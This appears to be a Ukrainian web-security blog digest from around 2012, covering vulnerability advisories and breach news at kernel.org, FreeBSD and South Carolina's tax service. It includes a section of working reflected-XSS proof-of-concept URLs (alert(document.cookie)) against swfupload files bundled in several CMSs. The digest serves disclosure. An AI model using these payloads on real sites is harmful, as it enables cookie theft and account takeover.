Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Multiple integer overflows in libxml2 (деталі)
• PIAF H.M.S - SQL Injection (деталі)
• request-tracker3.8 security update (деталі)
• rtfm security update (деталі)
• HP iNode Management Center, Remote Execution of Arbitrary Code (деталі)
• Exploit - EasyITSP by Lemens Telephone Systems 2.0.2 (деталі)
• SQL Injection Vulnerability in OrangeHRM (деталі)
• Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution Vulnerability (деталі)
• (0Day) HP iNode Management Center iNodeMngChecker.exe Remote Code Execution Vulnerability (деталі)
• PrestaShop <= 1.5.1 Persistent XSS (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах UK Cookie, Hitasoft FLV Player та Kakao Theme. Для котрих з’явилися експлоіти. UK Cookie - це плагін для сайтів в Великобританнії, де з 26.05.2012 почали діяти штрафи стосовно cookies, Hitasoft FLV Player - це FLV-плеєр, Kakao Theme - це тема движка.

• Reflective XSS in uk cookie plugin (деталі)
• WordPress Hitasoft FLV Player 1.1 SQL Injection (деталі)
• WordPress Kakao Theme SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, у США відбувся найбільший витік даних про платників податків.

Влада штату Південна Кароліна визнала факт витоку із серверів податкової служби 3,6 млн. номерів карт соціального страхування, 387 тис. кредитних карт, податкових декларацій громадян та іншої інформації про жителів штату і компанії, що ведуть тут діяльність.

Як повідомляється, невідомі зловмисники (можливо з Росії) викрали докладну фінансову інформацію про 80% жителів Південної Кароліни і про всі 657000 компаній, зареєстрованих у місцевій податковій службі. Це найбільший витік фінансових даних в історії США. Департамент по податкам і зборам Південної Кароліни опублікував термінове попередження для громадян з поясненням ситуації й інструкцією з подальших дій.

За повідомленням opennet.ru, Kernel.org піддався взлому.

Як повідомлялося ще 1 вересня, виявлено факт взлому декількох серверів в інфраструктурі Kernel.org, використовуваних для поширення архівів з вихідними текстами й обслуговування Git-репозиторіїв з ядром Linux. Нападникам вдалося одержати root-доступ до серверів, модифікувати системне програмне забезпечення й організувати перехоплення паролів розробників. Зокрема, нападники замінили openssh-server і openssh-clients, а також організували завантаження свого скрипта через систему ініціалізації.

Факт взлому був виявлений 28 серпня. Після цього взлому серверів основного проекту інфраструктури Linux, у вересні були виявлені взломи інших Linux ресурсів. Зокрема був виявлений факт взлому інфраструктури сайтів linuxfoundation.org і соціальної мережі Linux.com. Власники ресурсів зазначили, що подія можливо пов’язана з атакою на kernel.org.

За повідомленням opennet.ru, інфраструктура проекту FreeBSD піддалася взлому, не виключена підміна пакетів.

Проект FreeBSD опублікував повідомлення про виявлення слідів взлому двох серверів, що беруть участь у збірці пакетів. Інцидент зафіксований 11 листопада, але сліди взлому вказують на те, що зловмисники одержали контроль над системою 19 вересня. Цілісність усіх портів і пакетів, завантажених з 19 вересня по 11 листопада не гарантується.

Окремо відзначається, що взлом не торкнувся компонентів базової системи і портів, що розповсюджуються через svn.freebsd.org. Незважаючи на відсутність прямих свідчень підміни контента, користувачам, що оновлювали чи встановлювали в зазначений період пакети, рекомендовано оцінити доцільність проведення аудита безпеки чи перевстановлення своїх систем з нуля.

Як видно з даної інформації, взлом серверів FreeBSD відбувся у вересні одразу за вломами багатьох серверів інфраструктури Linux. Тому я вважаю, що ці атаки пов’язані. Це була цілеспрямована атака на популярні відкрити ОС, зокрема на сайти з їхніми вихідними кодами, щоб включити бекдори в код ОС або пакетів. Подібні випадки вже траплялися з популярними опенсорсними програмами, що можливо через природу відкритого ПЗ.

Учора, 22.11.2012, вийшли PHP 5.3.19 та PHP 5.4.9. В яких виправлено більше 15 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

В даній добірці експлоіти в веб додатках:

• NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution (деталі)
• ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection Vulnerability (деталі)
• Turbo FTP Server 1.30.823 PORT Overflow (деталі)
• lighttpd 1.4.31 Denial of Service PoC (деталі)
• Konqueror 4.7.3 Memory Corruption (деталі)

Раніше я писав про XSS уразливість в TinyMCE, SPIP, Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередніх записах я писав про веб додатки з swfupload_f8.swf, swfupload_f9.swf і swfupload.swf (які призначені для Flash Player 8, 9 і 10), то зараз я напишу про веб додатки з swfupload_f10.swf та swfupload_f11.swf, які призначені для Flash Player 10 і 11. Зокрема я виявив дану Cross-Site Scripting уразливість в SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir - серед багатьох веб додатків, що постачаються з swfupload_f10.swf або swfupload_f11.swf.

XSS:

SwfUploadPanel для TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin для TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Archiv plugin для TinyMCE окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В Liferay Portal окрім swfupload_f9.swf і swfupload_f8.swf, описаних раніше, також присутній і swfupload_f10.swf.

Swfupload для Drupal:

Як можна побачити з проекту http://code.google.com/p/drupal-swfupload/ - існує версія Swfupload для Drupal. Але саме в цьому проекті немає файлів. Зате вони є в проекті Respectiva, що представляє собою Drupal з Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload для Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Це стосовно swfupload_f10.swf. А стосовно swfupload_f11.swf, то в індексі Гугла є лише один проект - SentinelleOnAir, що містить swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії SwfUploadPanel для TYPO3 CMS, Archiv plugin для TinyMCE, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), Swfupload для Drupal, SWFUpload для Codeigniter та SentinelleOnAir (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Серед різних секюріті плагінів для WordPress, про деякі з них я вже розповідав, як то Сканер атак для WordPress, існує такий плагін як Wordfence Security.

Раніше я вже писав про уразливості в Wordfence Security.

Сам плагін Wordfence Security для WordPress є безкоштовним. Але є додаткові платні послуги, які можна придбати на офіційному сайті. Для цього на сайті www.wordfence.com потрібно отримати Wordfence API Key, який ділиться на безкоштовну та три платні версії (пакети послуг).

Wordfence представляє собою хмарний сервіс, реалізований у вигляді плагіна для WP. Він має чимало можливостей (а при купівлі преміум пакета - ще більше), з яких виділю головні.

• Захист від атак (firewall), в тому числі від Brute Force атак. Як раз в firewall модулі я знайшов вищезгадані уразливості в цьому плагіні.
• Антивірусний сканер (сканування malware на сайтах).
• Сканер шкідливих URL.
• Живий аналіз трафіку з геолокацією.
• Перевірка та виправлення ядра, тем і плагінів движка (від вірусів та бекдорів).

По наявності функції сканування malware на сайтах цей сервіс є безпосереднім конкурентом моїй Web VDS. По функції захисту від атак він подібний до вищезгаданого WordPress Attack Scanner. А по функції виявлення бекдорів він подібний до WordPress File Monitor та багатьох інших плагінів до WP, про які я вже писав.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://fmg.amu.gov.ua (хакером Margu) - 26.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.irums.amu.gov.ua (хакером Margu) - 26.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://fmg.amu.edu.ua (хакером Margu) - 26.08.2012, зараз сайт вже виправлений адмінами
• http://www.lab.org.ua (хакером I.ExTaZY)
• http://hacked.at.ua (хакером Mc_Hack) - у цього сайта достатньо влучна назва домена

Виявлена помилка форматного рядка в Applicure dotDefender.

Уразливі версії: Applicure dotDefender 4.26.

Не перевіряються форматні специфікатори при виведенні повідомлення про помилку. Раніше в 2008 році я сам знаходив дірки в dotDefender, тому не здивований новій уразливості в цьому WAF.

• Applicure dotDefender WAF format string vulnerability (деталі)

Цього року я вже писав про численні уразливості в Akismet для WordPress. Він є core-плагіном (починаючи з версії WP 2.0), тому ці уразливості також стосуються самого WordPress. А в жовтні були виявлені та оприлюднені дві Cross-Site Scripting уразливості в Akismet. Які стосуються невідомої версії плагіна (потенційно останньої версії). Вони були знайдені Nafsh.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

XSS:

В плагіні в скрипті legacy.php через параметр s та в скрипті admin.php через параметр url можна проводити XSS атаки. При цьому обходячи існуючі захисні фільтри.

• WordPress Akismet Cross Site Scripting (http://packetstormsecurity.org/files/117063/WordPress-Akismet-Cross-Site-Scripting.html)

При цьому автор зазначає, що атака відбувається при відправленні POST запитів до legacy.php і admin.php. Але при зверненні до цих скриптів (будь то GET чи POST запит), виводиться повідомлення про помилку (з FPD, про які я писав раніше). І автор наводить експлоіт для XSS в legacy.php - ясна річ неробочий (з вищенаведеної причини). Тому дані уразливості викликають сумніви, як враховуючи те, що атакуючі запити потрібно посилати іншим скриптам, так і наявність фільтрації вказаних параметрів (явно фейкові дірки).

Уразливі WordPress 3.x та попередні версії, що постачаються з вразливими версіями Akismet.